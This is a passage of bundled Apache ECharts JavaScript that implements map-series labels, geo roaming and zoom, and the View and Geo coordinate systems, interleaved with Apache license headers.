{\n                // Not exists in map\n                return;\n            }\n\n            var point = layout.point;\n            var offset = layout.offset;\n\n            var circle = new Circle({\n                style: {\n                    // Because the special of map draw.\n                    // Which needs statistic of multiple series and draw on one map.\n                    // And each series also need a symbol with legend color\n                    //\n                    // Layout and visual are put one the different data\n                    fill: mapModel.getData().getVisual('color')\n                },\n                shape: {\n                    cx: point[0] + offset * 9,\n                    cy: point[1],\n                    r: 3\n                },\n                silent: true,\n                // Do not overlap the first series, on which labels are displayed.\n                z2: 8 + (!offset ? Z2_EMPHASIS_LIFT + 1 : 0)\n            });\n\n            // Only the series that has the first value on the same region is in charge of rendering the label.\n            // But consider the case:\n            // series: [\n            //     {id: 'X', type: 'map', map: 'm', {data: [{name: 'A', value: 11}, {name: 'B', {value: 22}]},\n            //     {id: 'Y', type: 'map', map: 'm', {data: [{name: 'A', value: 21}, {name: 'C', {value: 33}]}\n            // ]\n            // The offset `0` of item `A` is at series `X`, but of item `C` is at series `Y`.\n            // For backward compatibility, we follow the rule that render label `A` by the\n            // settings on series `X` but render label `C` by the settings on series `Y`.\n            if (!offset) {\n\n                var fullData = mapModel.mainSeries.getData();\n                var name = originalData.getName(originalDataIndex);\n\n                var fullIndex = fullData.indexOfName(name);\n\n                var itemModel = originalData.getItemModel(originalDataIndex);\n                var labelModel = itemModel.getModel('label');\n                var hoverLabelModel = itemModel.getModel('emphasis.label');\n\n                var regionGroup = fullData.getItemGraphicEl(fullIndex);\n\n                // `getFormattedLabel` needs to use `getData` inside. Here\n                // `mapModel.getData()` is shallow cloned from `mainSeries.getData()`.\n                // FIXME\n                // If this is not the `mainSeries`, the item model (like label formatter)\n                // set on original data item will never get. But it has been working\n                // like that from the begining, and this scenario is rarely encountered.\n                // So it won't be fixed until have to.\n                var normalText = retrieve2(\n                    mapModel.getFormattedLabel(fullIndex, 'normal'),\n                    name\n                );\n                var emphasisText = retrieve2(\n                    mapModel.getFormattedLabel(fullIndex, 'emphasis'),\n                    normalText\n                );\n\n                var highDownRecord = regionGroup[HIGH_DOWN_PROP];\n                var recordVersion = Math.random();\n\n                // Prevent from register listeners duplicatedly when roaming.\n                if (!highDownRecord) {\n                    highDownRecord = regionGroup[HIGH_DOWN_PROP] = {};\n                    var onEmphasis = curry(onRegionHighDown, true);\n                    var onNormal = curry(onRegionHighDown, false);\n                    regionGroup.on('mouseover', onEmphasis)\n                        .on('mouseout', onNormal)\n                        .on('emphasis', onEmphasis)\n                        .on('normal', onNormal);\n                }\n\n                // Prevent removed regions effect current grapics.\n                regionGroup[RECORD_VERSION_PROP] = recordVersion;\n                extend(highDownRecord, {\n                    recordVersion: recordVersion,\n                    circle: circle,\n                    labelModel: labelModel,\n                    hoverLabelModel: hoverLabelModel,\n                    emphasisText: emphasisText,\n                    normalText: normalText\n                });\n\n                // FIXME\n                // Consider set option when emphasis.\n                enterRegionHighDown(highDownRecord, false);\n            }\n\n            group.add(circle);\n        });\n    }\n});\n\nfunction onRegionHighDown(toHighOrDown) {\n    var highDownRecord = this[HIGH_DOWN_PROP];\n    if (highDownRecord && highDownRecord.recordVersion === this[RECORD_VERSION_PROP]) {\n        enterRegionHighDown(highDownRecord, toHighOrDown);\n    }\n}\n\nfunction enterRegionHighDown(highDownRecord, toHighOrDown) {\n    var circle = highDownRecord.circle;\n    var labelModel = highDownRecord.labelModel;\n    var hoverLabelModel = highDownRecord.hoverLabelModel;\n    var emphasisText = highDownRecord.emphasisText;\n    var normalText = highDownRecord.normalText;\n\n    if (toHighOrDown) {\n        circle.style.extendFrom(\n            setTextStyle({}, hoverLabelModel, {\n                text: hoverLabelModel.get('show') ? emphasisText : null\n            }, {isRectText: true, useInsideStyle: false}, true)\n        );\n        // Make label upper than others if overlaps.\n        circle.__mapOriginalZ2 = circle.z2;\n        circle.z2 += Z2_EMPHASIS_LIFT;\n    }\n    else {\n        setTextStyle(circle.style, labelModel, {\n            text: labelModel.get('show') ? normalText : null,\n            textPosition: labelModel.getShallow('position') || 'bottom'\n        }, {isRectText: true, useInsideStyle: false});\n        // Trigger normalize style like padding.\n        circle.dirty(false);\n\n        if (circle.__mapOriginalZ2 != null) {\n            circle.z2 = circle.__mapOriginalZ2;\n            circle.__mapOriginalZ2 = null;\n        }\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {module:echarts/coord/View} view\n * @param {Object} payload\n * @param {Object} [zoomLimit]\n */\nfunction updateCenterAndZoom(\n    view, payload, zoomLimit\n) {\n    var previousZoom = view.getZoom();\n    var center = view.getCenter();\n    var zoom = payload.zoom;\n\n    var point = view.dataToPoint(center);\n\n    if (payload.dx != null && payload.dy != null) {\n        point[0] -= payload.dx;\n        point[1] -= payload.dy;\n\n        var center = view.pointToData(point);\n        view.setCenter(center);\n    }\n    if (zoom != null) {\n        if (zoomLimit) {\n            var zoomMin = zoomLimit.min || 0;\n            var zoomMax = zoomLimit.max || Infinity;\n            zoom = Math.max(\n                Math.min(previousZoom * zoom, zoomMax),\n                zoomMin\n            ) / previousZoom;\n        }\n\n        // Zoom on given point(originX, originY)\n        view.scale[0] *= zoom;\n        view.scale[1] *= zoom;\n        var position = view.position;\n        var fixX = (payload.originX - position[0]) * (zoom - 1);\n        var fixY = (payload.originY - position[1]) * (zoom - 1);\n\n        position[0] -= fixX;\n        position[1] -= fixY;\n\n        view.updateTransform();\n        // Get the new center\n        var center = view.pointToData(point);\n        view.setCenter(center);\n        view.setZoom(zoom * previousZoom);\n    }\n\n    return {\n        center: view.getCenter(),\n        zoom: view.getZoom()\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @payload\n * @property {string} [componentType=series]\n * @property {number} [dx]\n * @property {number} [dy]\n * @property {number} [zoom]\n * @property {number} [originX]\n * @property {number} [originY]\n */\nregisterAction({\n    type: 'geoRoam',\n    event: 'geoRoam',\n    update: 'updateTransform'\n}, function (payload, ecModel) {\n    var componentType = payload.componentType || 'series';\n\n    ecModel.eachComponent(\n        { mainType: componentType, query: payload },\n        function (componentModel) {\n            var geo = componentModel.coordinateSystem;\n            if (geo.type !== 'geo') {\n                return;\n            }\n\n            var res = updateCenterAndZoom(\n                geo, payload, componentModel.get('scaleLimit')\n            );\n\n            componentModel.setCenter\n                && componentModel.setCenter(res.center);\n\n            componentModel.setZoom\n                && componentModel.setZoom(res.zoom);\n\n            // All map series with same `map` use the same geo coordinate system\n            // So the center and zoom must be in sync. Include the series not selected by legend\n            if (componentType === 'series') {\n                each$1(componentModel.seriesGroup, function (seriesModel) {\n                    seriesModel.setCenter(res.center);\n                    seriesModel.setZoom(res.zoom);\n                });\n            }\n        }\n    );\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Simple view coordinate system\n * Mapping given x, y to transformd view x, y\n */\n\nvar v2ApplyTransform$1 = applyTransform;\n\n// Dummy transform node\nfunction TransformDummy() {\n    Transformable.call(this);\n}\nmixin(TransformDummy, Transformable);\n\nfunction View(name) {\n    /**\n     * @type {string}\n     */\n    this.name = name;\n\n    /**\n     * @type {Object}\n     */\n    this.zoomLimit;\n\n    Transformable.call(this);\n\n    this._roamTransformable = new TransformDummy();\n\n    this._rawTransformable = new TransformDummy();\n\n    this._center;\n    this._zoom;\n}\n\nView.prototype = {\n\n    constructor: View,\n\n    type: 'view',\n\n    /**\n     * @param {Array.<string>}\n     * @readOnly\n     */\n    dimensions: ['x', 'y'],\n\n    /**\n     * Set bounding rect\n     * @param {number} x\n     * @param {number} y\n     * @param {number} width\n     * @param {number} height\n     */\n\n    // PENDING to getRect\n    setBoundingRect: function (x, y, width, height) {\n        this._rect = new BoundingRect(x, y, width, height);\n        return this._rect;\n    },\n\n    /**\n     * @return {module:zrender/core/BoundingRect}\n     */\n    // PENDING to getRect\n    getBoundingRect: function () {\n        return this._rect;\n    },\n\n    /**\n     * @param {number} x\n     * @param {number} y\n     * @param {number} width\n     * @param {number} height\n     */\n    setViewRect: function (x, y, width, height) {\n        this.transformTo(x, y, width, height);\n        this._viewRect = new BoundingRect(x, y, width, height);\n    },\n\n    /**\n     * Transformed to particular position and size\n     * @param {number} x\n     * @param {number} y\n     * @param {number} width\n     * @param {number} height\n     */\n    transformTo: function (x, y, width, height) {\n        var rect = this.getBoundingRect();\n        var rawTransform = this._rawTransformable;\n\n        rawTransform.transform = rect.calculateTransform(\n            new BoundingRect(x, y, width, height)\n        );\n\n        rawTransform.decomposeTransform();\n\n        this._updateTransform();\n    },\n\n    /**\n     * Set center of view\n     * @param {Array.<number>} [centerCoord]\n     */\n    setCenter: function (centerCoord) {\n        if (!centerCoord) {\n            return;\n        }\n        this._center = centerCoord;\n\n        this._updateCenterAndZoom();\n    },\n\n    /**\n     * @param {number} zoom\n     */\n    setZoom: function (zoom) {\n        zoom = zoom || 1;\n\n        var zoomLimit = this.zoomLimit;\n        if (zoomLimit) {\n            if (zoomLimit.max != null) {\n                zoom = Math.min(zoomLimit.max, zoom);\n            }\n            if (zoomLimit.min != null) {\n                zoom = Math.max(zoomLimit.min, zoom);\n            }\n        }\n        this._zoom = zoom;\n\n        this._updateCenterAndZoom();\n    },\n\n    /**\n     * Get default center without roam\n     */\n    getDefaultCenter: function () {\n        // Rect before any transform\n        var rawRect = this.getBoundingRect();\n        var cx = rawRect.x + rawRect.width / 2;\n        var cy = rawRect.y + rawRect.height / 2;\n\n        return [cx, cy];\n    },\n\n    getCenter: function () {\n        return this._center || this.getDefaultCenter();\n    },\n\n    getZoom: function () {\n        return this._zoom || 1;\n    },\n\n    /**\n     * @return {Array.<number}\n     */\n    getRoamTransform: function () {\n        return this._roamTransformable.getLocalTransform();\n    },\n\n    /**\n     * Remove roam\n     */\n    _updateCenterAndZoom: function () {\n        // Must update after view transform updated\n        var rawTransformMatrix = this._rawTransformable.getLocalTransform();\n        var roamTransform = this._roamTransformable;\n        var defaultCenter = this.getDefaultCenter();\n        var center = this.getCenter();\n        var zoom = this.getZoom();\n\n        center = applyTransform([], center, rawTransformMatrix);\n        defaultCenter = applyTransform([], defaultCenter, rawTransformMatrix);\n\n        roamTransform.origin = center;\n        roamTransform.position = [\n            defaultCenter[0] - center[0],\n            defaultCenter[1] - center[1]\n        ];\n        roamTransform.scale = [zoom, zoom];\n\n        this._updateTransform();\n    },\n\n    /**\n     * Update transform from roam and mapLocation\n     * @private\n     */\n    _updateTransform: function () {\n        var roamTransformable = this._roamTransformable;\n        var rawTransformable = this._rawTransformable;\n\n        rawTransformable.parent = roamTransformable;\n        roamTransformable.updateTransform();\n        rawTransformable.updateTransform();\n\n        copy$1(this.transform || (this.transform = []), rawTransformable.transform || create$1());\n\n        this._rawTransform = rawTransformable.getLocalTransform();\n\n        this.invTransform = this.invTransform || [];\n        invert(this.invTransform, this.transform);\n\n        this.decomposeTransform();\n    },\n\n    getTransformInfo: function () {\n        var roamTransform = this._roamTransformable.transform;\n        var rawTransformable = this._rawTransformable;\n        return {\n            roamTransform: roamTransform ? slice(roamTransform) : create$1(),\n            rawScale: slice(rawTransformable.scale),\n            rawPosition: slice(rawTransformable.position)\n        };\n    },\n\n    /**\n     * @return {module:zrender/core/BoundingRect}\n     */\n    getViewRect: function () {\n        return this._viewRect;\n    },\n\n    /**\n     * Get view rect after roam transform\n     * @return {module:zrender/core/BoundingRect}\n     */\n    getViewRectAfterRoam: function () {\n        var rect = this.getBoundingRect().clone();\n        rect.applyTransform(this.transform);\n        return rect;\n    },\n\n    /**\n     * Convert a single (lon, lat) data item to (x, y) point.\n     * @param {Array.<number>} data\n     * @param {boolean} noRoam\n     * @param {Array.<number>} [out]\n     * @return {Array.<number>}\n     */\n    dataToPoint: function (data, noRoam, out) {\n        var transform = noRoam ? this._rawTransform : this.transform;\n        out = out || [];\n        return transform\n            ? v2ApplyTransform$1(out, data, transform)\n            : copy(out, data);\n    },\n\n    /**\n     * Convert a (x, y) point to (lon, lat) data\n     * @param {Array.<number>} point\n     * @return {Array.<number>}\n     */\n    pointToData: function (point) {\n        var invTransform = this.invTransform;\n        return invTransform\n            ? v2ApplyTransform$1([], point, invTransform)\n            : [point[0], point[1]];\n    },\n\n    /**\n     * @implements\n     * see {module:echarts/CoodinateSystem}\n     */\n    convertToPixel: curry(doConvert$1, 'dataToPoint'),\n\n    /**\n     * @implements\n     * see {module:echarts/CoodinateSystem}\n     */\n    convertFromPixel: curry(doConvert$1, 'pointToData'),\n\n    /**\n     * @implements\n     * see {module:echarts/CoodinateSystem}\n     */\n    containPoint: function (point) {\n        return this.getViewRectAfterRoam().contain(point[0], point[1]);\n    }\n\n    /**\n     * @return {number}\n     */\n    // getScalarScale: function () {\n    //     // Use determinant square root of transform to mutiply scalar\n    //     var m = this.transform;\n    //     var det = Math.sqrt(Math.abs(m[0] * m[3] - m[2] * m[1]));\n    //     return det;\n    // }\n};\n\nmixin(View, Transformable);\n\nfunction doConvert$1(methodName, ecModel, finder, value) {\n    var seriesModel = finder.seriesModel;\n    var coordSys = seriesModel ? seriesModel.coordinateSystem : null; // e.g., graph.\n    return coordSys === this ? coordSys[methodName](value) : null;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * [Geo description]\n * For backward compatibility, the orginal interface:\n * `name, map, geoJson, specialAreas, nameMap` is kept.\n *\n * @param {string|Object} name\n * @param {string} map Map type\n *        Specify the positioned areas by left, top, width, height\n * @param {Object.<string, string>} [nameMap]\n *        Specify name alias\n * @param {boolean} [invertLongitute=true]\n */\nfunction Geo(name, map$$1, nameMap, invertLongitute) {\n\n    View.call(this, name);\n\n    /**\n     * Map type\n     * @type {string}\n     */\n    this.map = map$$1;\n\n    var source = geoSourceManager.load(map$$1, nameMap);\n\n    this._nameCoordMap = source.nameCoordMap;\n    this._regionsMap = source.regionsMap;\n    this._invertLongitute = invertLongitute == null ? true : invertLongitute;\n\n    /**\n     * @readOnly\n     */\n    this.regions = source.regions;\n\n    /**\n     * @type {module:zrender/src/core/BoundingRect}\n     */\n    this._rect = source.boundingRect;\n}\n\nGeo.prototype = {\n\n    constructor: Geo,\n\n    type: 'geo',\n\n    /**\n     * @param {Array.<string>}\n     * @readOnly\n     */\n    dimensions: ['lng', 'lat'],\n\n    /**\n     * If contain given lng,lat coord\n     * @param {Array.<number>}\n     * @readOnly\n     */\n    containCoord: function (coord) {\n        var regions = this.regions;\n        for (var i = 0; i < regions.length; i++) {\n            if (regions[i].contain(coord)) {\n                return true;\n            }\n        }\n        return false;\n    },\n\n    /**\n     * @override\n     */\n    transformTo: function (x, y, width, height) {\n        var rect = this.getBoundingRect();\n        var invertLongitute = this._invertLongitute;\n\n        rect = rect.clone();\n\n        if (invertLongitute) {\n            // Longitute is inverted\n            rect.y = -rect.y - rect.height;\n        }\n\n        var rawTransformable = this._rawTransformable;\n\n        rawTransformable.transform = rect.calculateTransform(\n            new BoundingRect(x, y, width, height)\n        );\n\n        rawTransformable.decomposeTransform();\n\n        if (invertLongitute) {\n            var scale = rawTransformable.scale;\n            scale[1] = -scale[1];\n        }\n\n        rawTransformable.updateTransform();\n\n        this._updateTransform();\n    },\n\n    /**\n     * @param {string} name\n     * @return {module:echarts/coord/geo/Region}\n     */\n    getRegion: function (name) {\n        return this._regionsMap.get(name);\n    },\n\n    getRegionByCoord: function (coord) {\n        var regions = this.regions;\n        for (var i = 0; i < regions.length; i++) {\n            if (regions[i].contain(coord)) {\n                return regions[i];\n            }\n        }\n    },\n\n    /**\n     * Add geoCoord for indexing by name\n     * @param {string} name\n     * @param {Array.<number>} geoCoord\n     */\n    addGeoCoord: function (name, geoCoord) {\n        this._nameCoordMap.set(name, geoCoord);\n    },\n\n    /**\n     * Get geoCoord by name\n     * @param {string} name\n     * @return {Array.<number>}\n     */\n    getGeoCoord: function (name) {\n        return this._nameCoordMap.get(name);\n    },\n\n    /**\n     * @override\n     */\n    getBoundingRect: function () {\n        return this._rect;\n    },\n\n    /**\n     * @param {string|Array.<number>} data\n     * @param {boolean} noRoam\n     * @param {Array.<number>} [out]\n     * @return {Array.<number>}\n     */\n    dataToPoint: function (data, noRoam, out) {\n        if (typeof data === 'string') {\n            // Map area name to geoCoord\n            data = this.getGeoCoord(data);\n        }\n        if (data) {\n            return View.prototype.dataToPoint.call(this, data, noRoam, out);\n        }\n    },\n\n    /**\n     * @override\n     */\n    convertToPixel: curry(doConvert, 'dataToPoint'),\n\n    /**\n     * @override\n     */\n    convertFromPixel: curry(doConvert, 'pointToData')\n\n};\n\nmixin(Geo, View);\n\nfunction doConvert(methodName, ecModel, finder, value) {\n    var geoModel = finder.geoModel;\n    var seriesModel = finder.seriesModel;\n\n    var coordSys = geoModel\n        ? geoModel.coordinateSystem\n        : seriesModel\n        ? (\n            seriesModel.coordinateSystem // For map.\n            || (seriesModel.getReferringComponents('geo')[0] || {}).coordinateSystem\n        )\n        : null;\n\n    return coordSys === this ? coordSys[methodName](value) : null;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Resize method bound to the geo\n * @param {module:echarts/coord/geo/GeoModel|module:echarts/chart/map/MapModel} geoModel\n * @param {module:echarts/ExtensionAPI} api\n */\nfunction resizeGeo(geoModel, api) {\n\n    var boundingCoords = geoModel.get('boundingCoords');\n    if (boundingCoords != null) {\n        var leftTop = boundingCoords[0];\n        var rightBottom = boundingCoords[1];\n        if (isNaN(leftTop[0]) || isNaN(leftTop[1]) || isNaN(rightBottom[0]) || isNaN(rightBottom[1])) {\n            if (__DEV__) {\n                console.error('Invalid boundingCoords');\n            }\n        }\n        else {\n            this.setBoundingRect(leftTop[0], leftTop[1], rightBottom[0] - leftTop[0], rightBottom[1] - leftTop[1]);\n        }\n    }\n\n    var rect = this.getBoundingRect();\n\n    var boxLayoutOption;\n\n    var center = geoModel.get('layoutCenter');\n    var size = geoModel.get('layoutSize');\n\n    var viewWidth = api.getWidth();\n    var viewHeight = api.getHeight();\n\n    var aspect = rect.width / rect.height * this.aspectScale;\n\n    var useCenterAndSize = false;\n\n    if (center && size) {\n        center = [\n            parsePercent$1(center[0], viewWidth),\n            parsePercent$1(center[1], viewHeight)\n        ];\n        size = parsePercent$1(size, Math.min(viewWidth, viewHeight));\n\n        if (!isNaN(center[0]) && !isNaN(center[1]) && !isNaN(size)) {\n            useCenterAndSize = true;\n        }\n        else {\n            if (__DEV__) {\n                console.warn('Given layoutCenter or layoutSize data are invalid. Use left/top/width/height instead.');\n            }\n        }\n    }\n\n    var viewRect;\n    if (useCenterAndSize) {\n        var viewRect = {};\n        if (aspect > 1) {\n            // Width is same with size\n            viewRect.width = size;\n            viewRect.height = size / aspect;\n        }\n        else {\n            viewRect.height = size;\n            viewRect.width = size * aspect;\n        }\n        viewRect.y = center[1] - viewRect.height / 2;\n        viewRect.x = center[0] - viewRect.width / 2;\n    }\n    else {\n        // Use left/top/width/height\n        boxLayoutOption = geoModel.getBoxLayoutParams();\n\n        // 0.75 rate\n        boxLayoutOption.aspect = aspect;\n\n        viewRect = getLayoutRect(boxLayoutOption, {\n            width: viewWidth,\n            height: viewHeight\n        });\n    }\n\n    this.setViewRect(viewRect.x, viewRect.y, viewRect.width, viewRect.height);\n\n    this.setCenter(geoModel.get('center'));\n    this.setZoom(geoModel.get('zoom'));\n}\n\n/**\n * @param {module:echarts/coord/Geo} geo\n * @param {module:echarts/model/Model} model\n * @inner\n */\nfunction setGeoCoords(geo, model) {\n    each$1(model.get('geoCoord'), function (geoCoord, name) {\n        geo.addGeoCoord(name, geoCoord);\n    });\n}\n\nvar geoCreator = {\n\n    // For deciding which dimensions to use when creating list data\n    dimensions: Geo.prototype.dimensions,\n\n    create: function (ecModel, api) {\n        var geoList = [];\n\n        // FIXME Create each time may be slow\n        ecModel.eachComponent('geo', function (geoModel, idx) {\n            var name = geoModel.get('map');\n\n            var aspectScale = geoModel.get('aspectScale');\n            var invertLongitute = true;\n            var mapRecords = mapDataStorage.retrieveMap(name);\n            if (mapRecords && mapRecords[0] && mapRecords[0].type === 'svg') {\n                aspectScale == null && (aspectScale = 1);\n                invertLongitute = false;\n            }\n            else {\n                aspectScale == null && (aspectScale = 0.75);\n            }\n\n            var geo = new Geo(name + idx, name, geoModel.get('nameMap'), invertLongitute);\n\n            geo.aspectScale = aspectScale;\n            geo.zoomLimit = geoModel.get('scaleLimit');\n            geoList.push(geo);\n\n            setGeoCoords(geo, geoModel);\n\n            geoModel.coordinateSystem = geo;\n            geo.model = geoModel;\n\n            // Inject resize method\n            geo.resize = resizeGeo;\n\n            geo.resize(geoModel, api);\n        });\n\n        ecModel.eachSeries(function (seriesModel) {\n            var coordSys = seriesModel.get('coordinateSystem');\n            if (coordSys === 'geo') {\n                var geoIndex = seriesModel.get('geoIndex') || 0;\n                seriesModel.coordinateSystem = geoList[geoIndex];\n            }\n        });\n\n        // If has map series\n        var mapModelGroupBySeries = {};\n\n        ecModel.eachSeriesByType('map', function (seriesModel) {\n            if (!seriesModel.getHostGeoModel()) {\n                var mapType = seriesModel.getMapType();\n                mapModelGroupBySeries[mapType] = mapModelGroupBySeries[mapType] || [];\n                mapModelGroupBySeries[mapType].push(seriesModel);\n            }\n        });\n\n        each$1(mapModelGroupBySeries, function (mapSeries, mapType) {\n            var nameMapList = map(mapSeries, function (singleMapSeries) {\n                return singleMapSeries.get('nameMap');\n            });\n            var geo = new Geo(mapType, mapType, mergeAll(nameMapList));\n\n            geo.zoomLimit = retrieve.apply(null, map(mapSeries, function (singleMapSeries) {\n                return singleMapSeries.get('scaleLimit');\n            }));\n            geoList.push(geo);\n\n            // Inject resize method\n            geo.resize = resizeGeo;\n            geo.aspectScale = mapSeries[0].get('aspectScale');\n\n            geo.resize(mapSeries[0], api);\n\n            each$1(mapSeries, function (singleMapSeries) {\n                singleMapSeries.coordinateSystem = geo;\n\n                setGeoCoords(geo, singleMapSeries);\n            });\n        });\n\n        return geoList;\n    },\n\n    /**\n     * Fill given regions array\n     * @param  {Array.<Object>} originRegionArr\n     * @param  {string} mapName\n     * @param  {Object} [nameMap]\n     * @return {Array}\n     */\n    getFilledRegions: function (originRegionArr, mapName, nameMap) {\n        // Not use the original\n        var regionsArr = (originRegionArr || []).slice();\n\n        var dataNameMap = createHashMap();\n        for (var i = 0; i < regionsArr.length; i++) {\n            dataNameMap.set(regionsArr[i].name, regionsArr[i]);\n        }\n\n        var source = geoSourceManager.load(mapName, nameMap);\n        each$1(source.regions, function (region) {\n            var name = region.name;\n            !dataNameMap.get(name) && regionsArr.push({name: name});\n        });\n\n        return regionsArr;\n    }\n};\n\nregisterCoordinateSystem('geo', geoCreator);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar mapSymbolLayout = function (ecModel) {\n\n    var processedMapType = {};\n\n    ecModel.eachSeriesByType('map', function (mapSeries) {\n        var mapType = mapSeries.getMapType();\n        if (mapSeries.getHostGeoModel() || processedMapType[mapType]) {\n            return;\n        }\n\n        var mapSymbolOffsets = {};\n\n        each$1(mapSeries.seriesGroup, function (subMapSeries) {\n            var geo = subMapSeries.coordinateSystem;\n            var data = subMapSeries.originalData;\n            if (subMapSeries.get('showLegendSymbol') && ecModel.getComponent('legend')) {\n                data.each(data.mapDimension('value'), function (value, idx) {\n                    var name = data.getName(idx);\n                    var region = geo.getRegion(name);\n\n                    // If input series.data is [11, 22, '-'/null/undefined, 44],\n                    // it will be filled with NaN: [11, 22, NaN, 44] and NaN will\n                    // not be drawn. So here must validate if value is NaN.\n                    if (!region || isNaN(value)) {\n                        return;\n                    }\n\n                    var offset = mapSymbolOffsets[name] || 0;\n\n                    var point = geo.dataToPoint(region.center);\n\n                    mapSymbolOffsets[name] = offset + 1;\n\n                    data.setItemLayout(idx, {\n                        point: point,\n                        offset: offset\n                    });\n                });\n            }\n        });\n\n        // Show label of those region not has legendSymbol(which is offset 0)\n        var data = mapSeries.getData();\n        data.each(function (idx) {\n            var name = data.getName(idx);\n            var layout = data.getItemLayout(idx) || {};\n            layout.showLabel = !mapSymbolOffsets[name];\n            data.setItemLayout(idx, layout);\n        });\n\n        processedMapType[mapType] = true;\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar mapVisual = function (ecModel) {\n    ecModel.eachSeriesByType('map', function (seriesModel) {\n        var colorList = seriesModel.get('color');\n        var itemStyleModel = seriesModel.getModel('itemStyle');\n\n        var areaColor = itemStyleModel.get('areaColor');\n        var color = itemStyleModel.get('color')\n            || colorList[seriesModel.seriesIndex % colorList.length];\n\n        seriesModel.getData().setVisual({\n            'areaColor': areaColor,\n            'color': color\n        });\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// FIXME 公用？\n/**\n * @param {Array.<module:echarts/data/List>} datas\n * @param {string} statisticType 'average' 'sum'\n * @inner\n */\nfunction dataStatistics(datas, statisticType) {\n    var dataNameMap = {};\n\n    each$1(datas, function (data) {\n        data.each(data.mapDimension('value'), function (value, idx) {\n            // Add prefix to avoid conflict with Object.prototype.\n            var mapKey = 'ec-' + data.getName(idx);\n            dataNameMap[mapKey] = dataNameMap[mapKey] || [];\n            if (!isNaN(value)) {\n                dataNameMap[mapKey].push(value);\n            }\n        });\n    });\n\n    return datas[0].map(datas[0].mapDimension('value'), function (value, idx) {\n        var mapKey = 'ec-' + datas[0].getName(idx);\n        var sum = 0;\n        var min = Infinity;\n        var max = -Infinity;\n        